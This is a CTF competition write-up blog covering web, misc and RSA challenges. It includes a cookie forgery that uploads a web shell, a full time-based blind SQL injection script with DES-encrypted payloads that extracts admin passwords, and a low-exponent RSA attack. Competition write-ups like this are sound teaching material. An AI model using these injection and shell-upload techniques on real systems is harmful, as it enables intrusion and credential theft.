Altm4nz's blog

WEB dabbler

Cyberspace Security Technology Competition

WEB

web1

Register any account and log in. The change-password function is vulnerable:
intercept the change-password request, modify it, and use it to reset the admin password.
Log in as admin and notice that the img directory is listable:

http://117.34.117.216/img/img726849685.jpg
That image is the flag.

web2

The source is leaked through an exposed .git directory; recover it with GitHack.
index.php is encrypted, so read upload.php instead.
Craft the following cookie to upload a shell:

in_adminid=1,in_adminname=admin,in_adminpassword=1,in_permission=2,in_adminexpire=00e81e7d738c221945959d19c56cb33d

Connect with Caidao (China Chopper) and find fl4g.php:

PM9SCREW	†><Þî6o=‘®vD&©Ú?“LéXhpUòüM­ãÌósÂãL33CýRí¬¢½S2rœ<’2óxÒ7oä].º

It is encrypted too (the PM9SCREW header is php_screw). Decrypt it with the SCREW decoding tool: https://github.com/firebroo/screw_decode.git
After decryption the flag is flag{7cb3d823105433606ccac8fb75aed67c}
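For reference, here is an added example (my own code, not the writeup's and not screw_decode's) of how the php_screw format identified by that PM9SCREW header is built and undone: the PHP source is zlib-compressed, XORed byte by byte against a short key table indexed from the end of the buffer, and prefixed with the "\tPM9SCREW\t" magic. The key table below is made up for the demonstration; a real fl4g.php only decrypts with the pm9screw_mycryptkey table compiled into the target's php_screw extension (my_screw.h), which is the value screw_decode needs.

```python
import zlib

# php_screw layout: MAGIC, then zlib-compressed source XORed with a key table.
# Byte i of the compressed buffer is XORed with key[(len - i) % len(key)]; the C code
# casts the result to char, so only the low byte of each short in the table matters.
MAGIC = b"\tPM9SCREW\t"

# Assumption: a made-up key table for this example.  A real target must be decoded with
# the pm9screw_mycryptkey[] table from its php_screw.so build.
EXAMPLE_KEY = [0x1a2b, 0x3c4d, 0x5e6f, 0x0102, 0x7a7b, 0x2233, 0x4455, 0x6677]


def _xor_with_key(data, key):
    n = len(data)
    return bytes((b ^ (key[(n - i) % len(key)] & 0xff)) for i, b in enumerate(data))


def screw_encode(source, key=EXAMPLE_KEY):
    """What the `screw` encrypter does: compress, XOR, prepend the magic."""
    return MAGIC + _xor_with_key(zlib.compress(source), key)


def screw_decode(blob, key=EXAMPLE_KEY):
    """What the php_screw loader (and screw_decode) does: check magic, XOR, decompress."""
    if not blob.startswith(MAGIC):
        raise ValueError("not a php_screw file (missing PM9SCREW header)")
    return zlib.decompress(_xor_with_key(blob[len(MAGIC):], key))


# Constructed sample standing in for the encrypted fl4g.php.
SAMPLE_PHP = b"<?php\n$flag = 'flag{constructed-example}';\necho $flag;\n"
ENCRYPTED = screw_encode(SAMPLE_PHP)

if __name__ == "__main__":
    print(ENCRYPTED[:16])          # starts with the PM9SCREW magic, like fl4g.php
    print(screw_decode(ENCRYPTED))  # the original source again
```

Because the XOR index counts down from the buffer length, a decoder has to read the whole file before it can touch the first byte; that is also why a wrong key table produces zlib errors rather than partial plaintext.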

web3

The page redirects to Qzone; intercepting the traffic reveals a URL.
Requesting it returns a JS file; after deobfuscating and reviewing it, the key code is:

$.ajax({
    url: '/f701fee85540b78d08cb276d14953d58',
    type: 'POST',
    dataType: 'json',
    data: "data=" + encodeURIComponent(encryptByDES($('#loginform').serialize(), key)),
    error: function (er) {
        window.location.href = 'https://qzone.qq.com';
    }
})

The serialized form fields ip, hrUW3PG7mp3RLd3dJu and LxMzAX2jog9Bpjs07jP are candidates for SQL injection.
First reproduce the client-side encryption: the JS uses standard DES in ECB mode (key MiaoMiao, PKCS5 padding, base64 output), which pyDes reproduces in Python.
Then run a time-based blind injection: the payload calls sleep(5) when a guess is right, so a request that exceeds a 4-second timeout means the guess was correct.
Script:

import base64
import pyDes
import requests

url = 'http://45.76.49.10:8001/f701fee85540b78d08cb276d14953d58'
key = "MiaoMiao"   # DES key recovered from the deobfuscated JS
flag = ''


def des_ecb_encode(source, key):
    # Mirrors encryptByDES() in the JS: DES/ECB with PKCS5 padding, no IV
    des_obj = pyDes.des(key.encode('utf-8'), pyDes.ECB, IV=None, pad=None, padmode=pyDes.PAD_PKCS5)
    return des_obj.encrypt(source)


for i in range(1, 100):
    for j in range(33, 127):
        # Earlier rounds enumerated the admin table's columns and the database's tables:
        # message = "ip=1.1.1.1&hrUW3PG7mp3RLd3dJu=1',if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin'),%d,1))=%d),sleep(5),1))#&LxMzAX2jog9Bpjs07jP=" % (i, j)
        # message = "ip=1.1.1.1&hrUW3PG7mp3RLd3dJu=1',if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d),sleep(5),1))#&LxMzAX2jog9Bpjs07jP=" % (i, j)
        message = "ip=1.1.1.1&hrUW3PG7mp3RLd3dJu=1',if((ascii(substr((select group_concat(password) from admin),%d,1))=%d),sleep(5),1))#&LxMzAX2jog9Bpjs07jP=" % (i, j)
        code = des_ecb_encode(message, key)
        pay = base64.b64encode(code)
        data = {'data': pay}

        try:
            # sleep(5) fires on a correct guess, so a 4-second timeout means "hit"
            r = requests.post(url=url, data=data, timeout=4)
        except requests.exceptions.Timeout:
            flag += chr(j)
            print(flag)
            break
# tables: admin,users
# columns: username,password
# flag{73ad1744f38b68ece51076c7ac77621b}
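As an added example (not code from the writeup), the same time-based blind extraction rewritten to binary-search each byte instead of trying every printable character: the comparison in the injected expression changes from "=" to ">", which cuts the cost from up to 94 requests per character to about 7, and the string end is detected because ascii() of an empty substring is 0. The DES/base64 transport is left to the caller: oracle is any function that sends the injected fragment and returns True when the request timed out (sleep(5) fired). FAKE_DB and fake_oracle are constructed stand-ins so the code runs offline; the subquery strings are the ones used in the script above.

```python
import re


def build_payload(subquery, position, threshold):
    """Injected fragment for the vulnerable field, same shape as the script above
    (the extra ')' closes the server's own parenthesis), with '>' instead of '='."""
    return ("1',if((ascii(substr((%s),%d,1))>%d),sleep(5),1))#"
            % (subquery, position, threshold))


def extract(subquery, oracle, max_len=100):
    """Recover the value of `subquery` one byte at a time by binary search on 0..127."""
    result = ""
    for position in range(1, max_len + 1):
        lo, hi = 0, 127                      # candidate range for this byte
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_payload(subquery, position, mid)):
                lo = mid + 1                 # timed out: byte > mid
            else:
                hi = mid                     # answered quickly: byte <= mid
        if lo == 0:                          # ascii('') == 0: past the end of the string
            break
        result += chr(lo)
    return result


# --- Constructed stand-in for the target so the script runs offline ---
# A real oracle would encrypt the whole form with DES/ECB, POST it with timeout=4 and
# return True on requests.exceptions.Timeout.  This one parses position and threshold
# back out of the payload and answers the way the server's sleep(5) would.
FAKE_DB = {
    "select group_concat(table_name) from information_schema.tables where table_schema=database()":
        "admin,users",
    "select group_concat(password) from admin":
        "flag{constructed-example}",
}
PAYLOAD_RE = re.compile(r"substr\(\((.*)\),(\d+),1\)\)>(\d+)\)")


def fake_oracle(payload):
    m = PAYLOAD_RE.search(payload)
    subquery, position, threshold = m.group(1), int(m.group(2)), int(m.group(3))
    value = FAKE_DB[subquery]
    byte = ord(value[position - 1]) if position <= len(value) else 0
    return byte > threshold


if __name__ == "__main__":
    print(extract("select group_concat(table_name) from information_schema.tables where table_schema=database()", fake_oracle))
    print(extract("select group_concat(password) from admin", fake_oracle))
```

Deciding on requests.exceptions.Timeout only (rather than a bare except) matters with this approach: a connection error or a 5xx caught by a blanket except would be read as "byte > mid" and silently corrupt the search.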

misc

misc3

The ICMP packets in the capture all look alike; on closer inspection each echo request differs from the others in just two letters.
Sorting the packets by time and concatenating those letters gives flag{RyHgbCf5OhFEiyJnlt9c8ASP}
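An added example of that extraction step (my code, not the writeup's): given (timestamp, payload) pairs, find the byte offsets that vary across the echo requests and read them out in capture order. The packet list is constructed here to stand in for what you would export from Wireshark; it is deliberately shuffled so that the sort by timestamp matters, and the constant part of the payload is the usual 32-byte Windows ping pattern.

```python
# Classic Windows echo-request payload; the exfil channel overwrites its first two bytes.
BASE = b"abcdefghijklmnopqrstuvwabcdefghi"


def varying_positions(payloads):
    """Byte offsets at which the payloads are not all identical."""
    length = min(len(p) for p in payloads)
    return [i for i in range(length) if len({p[i] for p in payloads}) > 1]


def extract_flag(packets):
    """packets: iterable of (timestamp, payload).  Returns the bytes that differ
    between packets, concatenated in timestamp order."""
    ordered = [payload for _, payload in sorted(packets, key=lambda tp: tp[0])]
    positions = varying_positions(ordered)
    return b"".join(bytes(p[i] for i in positions) for p in ordered)


# Constructed capture: two flag bytes per echo request at offsets 0-1, listed out of order.
FLAG = b"flag{icmp-example}"
PACKETS = [(1.0 + 0.5 * k, FLAG[2 * k:2 * k + 2] + BASE[2:]) for k in range(len(FLAG) // 2)]
PACKETS = PACKETS[5:] + PACKETS[:5]   # scramble the capture order on purpose

if __name__ == "__main__":
    print(varying_positions([p for _, p in PACKETS]))
    print(extract_flag(PACKETS))
```

On a real pcap, filter to echo requests in one direction first (replies echo the same payload back and would double every character), and check that the varying offsets are contiguous; a scattered set usually means the sender also varied the ICMP sequence number or identifier, which belong to the header rather than the data.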

RSA2

e=3, the classic low-exponent attack. Script:

import gmpy2

c = 80256065280425989347153660555632253204654757632704797390559450985825600409910703812294413750536361555897348650491697548574007864446117693097103136799284683292648287334023253488891301144881769557674366138889636475162525325855368132832237345279798028008137655682278413635753791609965810603989005785747744993045461207072415730041608172272077090225741385971

n = 27262030738190162906068533309218248319312037416856794814532459866130196673561833084739048171769479893806671499522643803412108279907223895517897969906253626028270289028646596897429641138913001561947557784840311014399973312098056896539904624036584153785225626096007313018814076860235378686567457599895712604364100507424939342862464483596795761725357279364545154915110900098124905389351969357103586063992040096368146580315262263546850581515833590884397726108478477798668261762306189036525841356592859315437201733146083995028221597538824801113980100295046731791678895520928441645173205511865657977068061078456941189550383
e = 3

# With e = 3 and a short plaintext, m^3 is only slightly larger than n, so c + i*n is an
# exact cube for some small i.  gmpy2.iroot returns (root, exact).
i = 0
while True:
    m, exact = gmpy2.iroot(c + i * n, e)
    if exact:
        print("success")
        print(i)
        break
    i += 1

print(m)

Then convert the hex of m to text to get: my password is: I_Lov5_RSA_Rel6te7_me8sagE_aTTacK
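An added example (my code, not the writeup's script) of the same small-exponent attack with only the standard library, which also makes the reasoning explicit: c = m^3 mod n means c = m^3 - k*n for an integer k, and with e = 3 and a short message m^3 is only a few multiples of n, so trying k = 0, 1, 2, ... until c + k*n is a perfect cube recovers m. The key pair, primes and message below are constructed for the demonstration (the primes are found with a Miller-Rabin search and chosen with p = 2 mod 3 so that e = 3 is a valid exponent); the integer k-th root is a plain Newton iteration in place of gmpy.root.

```python
import math

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]


def is_probable_prime(n):
    """Miller-Rabin with fixed bases; deterministic for the ~80-bit numbers used here."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def next_prime_2_mod_3(start):
    """First prime >= start with p = 2 (mod 3), so that 3 does not divide p - 1."""
    p = start | 1
    while not (p % 3 == 2 and is_probable_prime(p)):
        p += 2
    return p


def iroot(x, k):
    """Integer k-th root by Newton's method: (floor(x ** (1/k)), exact?)."""
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + k - 1) // k)      # starting point >= the true root
    while True:
        y = ((k - 1) * r + x // r ** (k - 1)) // k
        if y >= r:
            break
        r = y
    return r, r ** k == x


def low_exponent_attack(c, n, e=3, max_k=1 << 20):
    """Recover m from c = m^e mod n when m^e < max_k * n.  Returns (m, k) or None."""
    for k in range(max_k):
        m, exact = iroot(c + k * n, e)
        if exact:
            return m, k
    return None


# Constructed key (assumption: two ~80-bit primes, not the challenge's n).
P = next_prime_2_mod_3(1 << 79)
Q = next_prime_2_mod_3(3 << 78)
N = P * Q
E = 3
assert math.gcd(E, (P - 1) * (Q - 1)) == 1       # e = 3 is a valid public exponent here

MESSAGE = b"ctf-msg"                              # 7 bytes: m^3 is a few dozen multiples of n
M = int.from_bytes(MESSAGE, "big")
C = pow(M, E, N)                                  # what the challenge hands you


def recover_message(c=C, n=N, e=E):
    """The attack followed by the 'hex to text' step."""
    hit = low_exponent_attack(c, n, e)
    if hit is None:
        return None
    m, _ = hit
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    m, k = low_exponent_attack(C, N, E)
    print("k =", k, "plaintext =", recover_message())
```

The loop bound is the practical limit of this attack: k is roughly m^3 / n, so once the plaintext is long enough (or padded) that m^3 is many orders of magnitude above n, the search is hopeless and e = 3 on its own is not exploitable this way.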